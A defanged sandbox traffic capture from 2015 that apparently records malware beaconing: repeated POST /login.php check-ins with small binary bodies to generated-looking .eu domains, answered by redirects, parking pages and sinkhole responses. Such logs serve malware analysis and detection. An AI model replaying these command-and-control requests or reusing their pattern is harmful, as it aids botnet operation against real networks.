uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDc0ODhkfHx8MTQ0ODAxMDU0NC
40OTA1fDQzZTM0ZWMyNzk5ZjhjZDM1YWIyYjU1ZTZhZDdmZjcxMjNkNmQ4ZGV8fHx8fDF8
fHwwfDU2NGVlMzMwZjg1MjVmZjY0YzhiNmQ2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.galokusemus.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:24 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;galokusemus.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'galokusemus.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0MC4zNzQ1OmJjMjE0NzM1MTkzNDc2MWFkMWJiYWY
2YzRhMWI3NjQwYTljNjRkMDFlYzU2NmM4NDRiYTIxMjgxNjA5Y2E1NmY6NTY0ZWUzMmM1Y
jZmMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyYzVhNzFhfHx8MTQ0ODAxMDU0MC
4zNzg3fDAxYmZkMzU0NTNjYTdmOGMzMzhiZmQyOTQzZmUzYmVjYmU5MWYwOTB8fHx8fDF8
fHwwfDU2NGVlMzJjZmE1MjVmYjQ0MThiNDk1Ynx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET /domain/kemocujufys.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu

Location: hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6

3e..Go hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: novomyfexij.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:06 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.novomyfexij.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:06 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.novomyfexi
j.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nopegymozow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/nopegymozow.eu

Set-Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.ganycyhywek.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:32 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f3..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;ganycyhywek.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'ganycyhywek.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0OC40MjE6NWRiY2I0OWIyZGRkYzIzYmJlY2FiNzE
xYThkOGRmODhlZTY5NTUxMzNhZTM5OWQzYWMyZjg0YzFiMDBiMjU1ZTo1NjRlZTMzNDY2Y
2Rk';.var clickTracking = false;.var themedata = '';.var xkw = '';.var
 xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var cli
entID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.v
ar scriptPath = '';...</script>...<script src='hXXp://parking
crew.net/assets/scripts/js3.js' type='text/javascript' language='JavaS
cript'></script>...<script type='text/javascript' language
='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxi
dWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzNDY1MjY5fHx8MTQ0ODAxMDU0OC40Mj
Q5fGJlZDNjY2NlYjNkY2Q1MGY1Y2NhODlmZmE0ZDc5ZWMxYmEzN2JlMDZ8fHx8fDF8fHww
fDU2NGVlMzM0OGFiZjgyYjI0MzhiNjA5ZXx8fDB8fHx8fHwwfHx8fHx8fHx8';</scr
ipt>..</head>..<body>...<script type='text/javascrip
t' language='JavaScript'>.window.onload = function() {..if(clickTra
cking && typeof track_onclick == 'function') track_onclick("899acbee21
dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "hXXp://qui<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kemocujufys.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/kemocujufys.eu

Set-Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qeqinuqypoq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/qeqinuqypoq.eu

Set-Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET /domain/marytymenok.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu

Location: hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960

3e..Go hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jeluganusog.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.jeluganusog.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.jeluganusog.e
u..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.mamixikusah.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:04 GMT

Server: Apache

Set-Cookie: vsid=902vr1955561446822064; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.mamixikusah.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=64

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMM
GZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.mamixikusah.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.mamixikusah.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.mamixikusah.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.mamixikus
ah.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysovidacyx.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:30 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ze1.zeroredirect1.
com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525..Vary: Accept-Encod
ing..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: masawocipel.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:11 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.masawocipel.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:11 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.masawocipel.e
u..Vary: Accept-Encoding..

GET /domain/gatedyhavyd.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu

Location: hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81

3e..Go hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81..0.
.

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.jeluganusog.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:07 GMT

Server: Apache

Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=51

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ
3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.jeluganusog.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.jeluganusog.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.jeluganusog.eu&_cfrg=1&_driHTTP/1.1 200 OK..Date: Fri, 20 Nov 201
5 09:09:07 GMT..Server: Apache..Set-Cookie: vsid=917vr1955561475706158
; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganus
og.eu; httponly..X-Frame-Options: DENY..X-Adblock-Key: MFwwDQYJKoZIhvc
NAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6
DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3o
b9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==..Vary: 
Accept-Encoding,User-Agent..Content-Length: 1686..Keep-Alive: timeout=
5, max=51..Connection: Keep-Alive..Content-Type: text/html; charse<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganycyhywek.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:38 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.ganycyhywek.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:38 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.ganycyhywe
k.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.masawocipel.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:43 GMT

Server: Apache

Set-Cookie: vsid=919vr1955561836832705; expires=Wed, 18-Nov-2020 09:09:43 GMT; path=/; domain=ww92.masawocipel.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=58

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1
XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.masawocipel.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.masawocipel.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.masawocipel.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.masawocip
el.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

GET /d1e2832667be3ac8af2587e3c0958424 HTTP/1.1

Host: xsso.tucyguqaciq.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
19..Landed tucyguqaciq.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.ryleryqacic.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:04 GMT

Server: Apache

Set-Cookie: vsid=916vr1955561446614594; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.ryleryqacic.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=109

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8
rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.ryleryqacic.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.ryleryqacic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.ryleryqacic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.ryleryqac
ic.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatedyhavyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/gatedyhavyd.eu

Set-Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqufyduras.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:52 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.xuqufyduras.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:52 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
